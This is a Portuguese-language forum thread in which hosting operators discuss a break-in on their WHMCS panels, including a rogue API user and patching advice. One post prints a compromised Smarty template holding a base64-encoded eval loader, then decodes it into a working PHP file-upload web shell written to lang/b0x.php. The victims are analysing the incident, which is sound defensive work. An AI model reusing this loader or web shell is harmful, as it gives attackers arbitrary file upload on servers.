Tentativas de invasão em meu WHMCS

[Cristian Augusto]

Teremos que voltar a éra do papel e caneta! rs

[EuMarcos]

Ta dificil viu confiar no WHMCS.

Acaram de criar um usuario em meu WHMCS: APIUSER

[Cristian Augusto]

Acabei de colocar meu WHMCS em modo manutenção.

Irei deixar assim até a poeira baixar, nesta madrugada..

[EuMarcos]

Eu já estou a fazer uma cotação com um programador gringo, para criação de um painel própio.

Assim não dá, perder madrugadas por falhas do whmcs não dá.

O trabalho já é stress.

[chuvadenovembro]

Ta dificil viu confiar no WHMCS.

Acaram de criar um usuario em meu WHMCS: APIUSER

Precisa baixar a atualização deste link:

http://forum.whmcs.com/showthread.php?t=43462

[EuMarcos]

Precisa baixar a atualização deste link:

http://forum.whmcs.com/showthread.php?t=43462

Fiz essa atualização, no dia do lançamento.

[chuvadenovembro]

Fiz essa atualização, no dia do lançamento.

Tenta fazer uma varredura com este script em seu servidor:

http://forum.portaldohost.com.br/threads/6793-Maldet-identifica%C3%A7%C3%A3o-de-malwares-no-servidor?p=61976#post61976

[EuMarcos]

Tenta fazer uma varredura com este script em seu servidor:

Realizei a contratação de um outro: http://www.atomicorp.com/products/asl.html

[chuvadenovembro]

Pessoal,

Estava comparando o codigo com o postado pelo Edvan, e notei que é diferente.

O conteúdo do arquivo é este aqui:

<?php /* Smarty version 2.6.26, created on 2011-12-10 00:54:09

compiled from emailtpl:emailsubject */ ?>

[Ticket ID: 248848] <?php eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNtbG1LRUJqYjNCNUtDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhTd2dKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdJR1ZqYUc4Z0p6eGlQbFZ3Ykc5aFpDQlRWVXRUUlZNZ0lTRWhQQzlpUGp4aWNqNDhZbkkrSnpzZ2ZRMEtaV3h6WlNCN0lHVmphRzhnSnp4aVBsVndiRzloWkNCSFFVZEJUQ0FoSVNFOEwySStQR0p5UGp4aWNqNG5PeUI5RFFwOURRby9QaUE9Jyk7DQokZm8gPSBmb3BlbiAoImxhbmcvYjB4LnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw==')); ?>

Tirando a criptografia (se não estiver errado), tem o seguinte codigo:

m^r^$code = base64_decode('PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBTVUtTRVMgISEhPC9iPjxicj48YnI+JzsgfQ0KZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBHQUdBTCAhISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/PiA=');

$fo = fopen ("lang/b0x.php","w");

fwrite($fo,$code);

O curioso, é que o arquivo b0x.php não está na minha pasta lang, só tem os arquivos de linguagem normal.

E tirando esse trecho criptografado, tem este codigo:

m^r^<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?>

Lembrando que o user que foi criado em meu whmcs é apiuser ou userapi (não lembro agora)

Eu procurei via shh o arquivo b0x.php no servidor e não foi encontrado.

[Cassiano Teixeira]

Esta virando uma grande confusão isso. Não sei se era a vontade do individuo, mais está conseguindo criar essa "tempestade"

- Agora é esperar a chuva passar :confused: